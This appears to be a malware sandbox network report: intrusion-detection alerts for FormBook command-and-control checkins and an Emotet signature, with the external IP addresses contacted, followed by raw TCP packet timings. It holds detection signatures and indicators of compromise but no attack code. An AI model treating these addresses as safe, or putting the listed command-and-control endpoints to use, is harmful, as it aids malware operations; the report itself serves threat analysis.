2024-08-27T07:57:27.852650+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49840 | 443 | 192.168.11.20 | 199.103.62.205
2024-08-27T08:00:37.994808+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49878 | 80 | 192.168.11.20 | 199.59.243.226
2024-08-27T07:56:31.449828+0200 | TCP | 2035065 | ET MALWARE W32/Emotet.v4 Checkin Fake 404 Payload Response | 1 | 80 | 49897 | 103.247.8.53 | 192.168.11.20
2024-08-27T07:56:31.449828+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49891 | 80 | 192.168.11.20 | 76.223.54.146
2024-08-27T07:56:31.449828+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49932 | 80 | 192.168.11.20 | 84.32.84.32
2024-08-27T07:56:31.449828+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49934 | 80 | 192.168.11.20 | 84.32.84.32
2024-08-27T07:56:31.449828+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49933 | 80 | 192.168.11.20 | 84.32.84.32
2024-08-27T07:58:24.994150+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49842 | 80 | 192.168.11.20 | 103.247.8.53
2024-08-27T08:00:51.831882+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49882 | 80 | 192.168.11.20 | 85.159.66.93
2024-08-27T07:59:44.637737+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49863 | 80 | 192.168.11.20 | 203.161.46.205
2024-08-27T08:05:17.802841+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49930 | 80 | 192.168.11.20 | 185.230.15.3
2024-08-27T08:04:08.526914+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49910 | 80 | 192.168.11.20 | 172.67.191.241
2024-08-27T08:01:19.172926+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49890 | 80 | 192.168.11.20 | 76.223.54.146
2024-08-27T08:03:55.113825+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49906 | 80 | 192.168.11.20 | 23.231.158.3
2024-08-27T08:05:01.056269+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49925 | 80 | 192.168.11.20 | 154.23.184.207
2024-08-27T07:58:52.502095+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49848 | 80 | 192.168.11.20 | 96.126.123.244
2024-08-27T08:03:35.769154+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49900 | 80 | 192.168.11.20 | 96.126.123.244
2024-08-27T08:01:10.930779+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49888 | 80 | 192.168.11.20 | 176.57.64.102
2024-08-27T07:59:20.337134+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49856 | 80 | 192.168.11.20 | 172.67.191.241
2024-08-27T08:03:16.639680+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49897 | 80 | 192.168.11.20 | 103.247.8.53
2024-08-27T08:04:46.450056+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49921 | 80 | 192.168.11.20 | 18.183.3.45
2024-08-27T07:59:56.100695+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49866 | 80 | 192.168.11.20 | 18.183.3.45
2024-08-27T08:04:32.544955+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49917 | 80 | 192.168.11.20 | 203.161.46.205
2024-08-27T07:59:33.600505+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49860 | 80 | 192.168.11.20 | 172.67.166.145
2024-08-27T07:58:47.168777+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49846 | 80 | 192.168.11.20 | 96.126.123.244
2024-08-27T08:03:41.115882+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49902 | 80 | 192.168.11.20 | 96.126.123.244
2024-08-27T08:04:49.253905+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49922 | 80 | 192.168.11.20 | 18.183.3.45
2024-08-27T08:00:54.579089+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49883 | 80 | 192.168.11.20 | 85.159.66.93
2024-08-27T08:03:38.442062+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49901 | 80 | 192.168.11.20 | 96.126.123.244
2024-08-27T07:59:41.945928+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49862 | 80 | 192.168.11.20 | 203.161.46.205
2024-08-27T08:04:05.899545+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49909 | 80 | 192.168.11.20 | 172.67.191.241
2024-08-27T08:04:29.841545+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49916 | 80 | 192.168.11.20 | 203.161.46.205
2024-08-27T08:04:03.267187+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49908 | 80 | 192.168.11.20 | 172.67.191.241
2024-08-27T07:59:31.128997+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49859 | 80 | 192.168.11.20 | 172.67.166.145
2024-08-27T08:04:58.240454+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49924 | 80 | 192.168.11.20 | 154.23.184.207
2024-08-27T08:00:40.633351+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49879 | 80 | 192.168.11.20 | 199.59.243.226
2024-08-27T07:59:01.196227+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49850 | 80 | 192.168.11.20 | 23.231.158.3
2024-08-27T07:59:04.039854+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49851 | 80 | 192.168.11.20 | 23.231.158.3
2024-08-27T08:00:27.228786+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49875 | 80 | 192.168.11.20 | 185.230.15.3
2024-08-27T08:03:19.345694+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49898 | 80 | 192.168.11.20 | 103.247.8.53
2024-08-27T07:58:28.599071+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49843 | 80 | 192.168.11.20 | 103.247.8.53
2024-08-27T08:04:35.244334+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49918 | 80 | 192.168.11.20 | 203.161.46.205
2024-08-27T08:03:13.760882+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49896 | 80 | 192.168.11.20 | 103.247.8.53
2024-08-27T07:59:17.715231+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49855 | 80 | 192.168.11.20 | 172.67.191.241
2024-08-27T08:00:01.684344+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49868 | 80 | 192.168.11.20 | 18.183.3.45
2024-08-27T07:59:15.080980+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49854 | 80 | 192.168.11.20 | 172.67.191.241
2024-08-27T08:04:43.653288+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49920 | 80 | 192.168.11.20 | 18.183.3.45
2024-08-27T08:00:10.236932+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49870 | 80 | 192.168.11.20 | 154.23.184.207
2024-08-27T07:58:49.833549+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49847 | 80 | 192.168.11.20 | 96.126.123.244
2024-08-27T08:00:57.342683+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49884 | 80 | 192.168.11.20 | 85.159.66.93
2024-08-27T08:04:16.565560+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49912 | 80 | 192.168.11.20 | 172.67.166.145
2024-08-27T08:04:19.188671+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49913 | 80 | 192.168.11.20 | 172.67.166.145
2024-08-27T07:59:28.483073+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49858 | 80 | 192.168.11.20 | 172.67.166.145
2024-08-27T08:00:24.460006+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49874 | 80 | 192.168.11.20 | 185.230.15.3
2024-08-27T08:04:21.679269+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49914 | 80 | 192.168.11.20 | 172.67.166.145
2024-08-27T08:01:24.458065+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49892 | 80 | 192.168.11.20 | 76.223.54.146
2024-08-27T07:59:47.339867+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49864 | 80 | 192.168.11.20 | 203.161.46.205
2024-08-27T08:05:12.296959+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49928 | 80 | 192.168.11.20 | 185.230.15.3
2024-08-27T07:58:30.561454+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49844 | 80 | 192.168.11.20 | 103.247.8.53
2024-08-27T08:00:15.956015+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49872 | 80 | 192.168.11.20 | 154.23.184.207
2024-08-27T08:05:15.074084+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49929 | 80 | 192.168.11.20 | 185.230.15.3
2024-08-27T08:03:49.519118+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49904 | 80 | 192.168.11.20 | 23.231.158.3
2024-08-27T07:59:58.889890+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49867 | 80 | 192.168.11.20 | 18.183.3.45
2024-08-27T08:01:08.416293+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49887 | 80 | 192.168.11.20 | 176.57.64.102
                                                Aug 27, 2024 07:58:32.565888882 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.565979958 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.565992117 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.566065073 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.566071987 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.566138983 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.566186905 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.566186905 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.566225052 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.566276073 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.566315889 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.566394091 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.566394091 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.657388926 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.657603025 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.747067928 CEST4984580192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:33.091995955 CEST8049845103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:33.092155933 CEST4984580192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:33.097264051 CEST4984580192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:33.443058014 CEST8049845103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:33.565958977 CEST8049845103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:33.566029072 CEST8049845103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:33.566433907 CEST4984580192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:33.568234921 CEST4984580192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:33.913106918 CEST8049845103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:46.892843962 CEST4984680192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:47.025749922 CEST804984696.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:47.025976896 CEST4984680192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:47.033322096 CEST4984680192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:47.168495893 CEST804984696.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:47.168515921 CEST804984696.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:47.168776989 CEST4984680192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:48.538552999 CEST4984680192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:49.555830002 CEST4984780192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:49.689187050 CEST804984796.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:49.689426899 CEST4984780192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:49.696741104 CEST4984780192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:49.833240032 CEST804984796.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:49.833306074 CEST804984796.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:49.833549023 CEST4984780192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:51.209806919 CEST4984780192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.227188110 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.359945059 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.360198975 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.368853092 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.501888037 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.501967907 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.502022982 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.502069950 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.502094984 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.502115965 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.502167940 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.502188921 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.502216101 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.502243042 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.502264023 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.502319098 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.502429962 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.502638102 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.503048897 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.553195953 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.635456085 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.635535002 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.635586977 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.635636091 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.635673046 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.635797024 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.635813951 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.635862112 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.635910034 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.635977030 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.636157990 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.636382103 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.636507988 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.769048929 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.769136906 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.769190073 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.769236088 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.769490004 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.769565105 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.769615889 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.769802094 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:53.881172895 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:54.898489952 CEST4984980192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:55.031167984 CEST804984996.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:55.031323910 CEST4984980192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:55.036791086 CEST4984980192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:55.172287941 CEST804984996.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:55.172358036 CEST804984996.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:55.172425032 CEST804984996.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:55.172729015 CEST4984980192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:55.174640894 CEST4984980192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:55.307234049 CEST804984996.126.123.244192.168.11.20
                                                Aug 27, 2024 07:59:00.467009068 CEST4985080192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:00.771187067 CEST804985023.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:00.771368980 CEST4985080192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:00.778865099 CEST4985080192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:01.082706928 CEST804985023.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:01.196021080 CEST804985023.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:01.196227074 CEST4985080192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:02.285360098 CEST4985080192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:02.589329958 CEST804985023.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:03.302678108 CEST4985180192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:03.617105007 CEST804985123.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:03.617299080 CEST4985180192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:03.624777079 CEST4985180192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:03.939194918 CEST804985123.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:04.039649963 CEST804985123.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:04.039854050 CEST4985180192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:05.128439903 CEST4985180192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:05.442982912 CEST804985123.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:06.146147013 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.465392113 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:06.465523005 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.475186110 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.475239038 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.475286007 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.794516087 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:06.794689894 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.794873953 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:06.794960976 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:06.795053005 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.795090914 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:06.795223951 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.795273066 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.795361996 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.795527935 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.795697927 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.894383907 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.114212990 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.114281893 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.114406109 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.114556074 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.114680052 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.115036964 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.115164995 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.115288973 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.115411043 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:09.004656076 CEST4985380192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:09.316817999 CEST804985323.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:09.317027092 CEST4985380192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:09.322065115 CEST4985380192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:09.633965969 CEST804985323.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:09.734426975 CEST804985323.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:09.734579086 CEST4985380192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:09.735177040 CEST4985380192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:10.046680927 CEST804985323.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:14.858779907 CEST4985480192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:14.959480047 CEST8049854172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:14.959712982 CEST4985480192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:14.967185020 CEST4985480192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:15.067923069 CEST8049854172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:15.080246925 CEST8049854172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:15.080780029 CEST8049854172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:15.080980062 CEST4985480192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:16.469738960 CEST4985480192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:17.487138987 CEST4985580192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:17.589615107 CEST8049855172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:17.589904070 CEST4985580192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:17.597347021 CEST4985580192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:17.697865009 CEST8049855172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:17.714504004 CEST8049855172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:17.715033054 CEST8049855172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:17.715230942 CEST4985580192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:19.109810114 CEST4985580192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.127186060 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.227832079 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.228001118 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.236553907 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.236601114 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.236653090 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.336937904 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337029934 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337133884 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.337152958 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337276936 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337284088 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.337285042 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337403059 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337455034 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.337524891 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337533951 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337542057 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337625027 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.337795973 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337799072 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.337987900 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.351413012 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.351555109 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.351788998 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.437750101 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.437835932 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.437846899 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438052893 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438060999 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438178062 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438186884 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438302994 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438312054 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438427925 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438551903 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438560009 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438677073 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438801050 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.439065933 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.439189911 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.439198971 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.439315081 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.452044010 CEST8049856172.67.191.241192.168.11.20
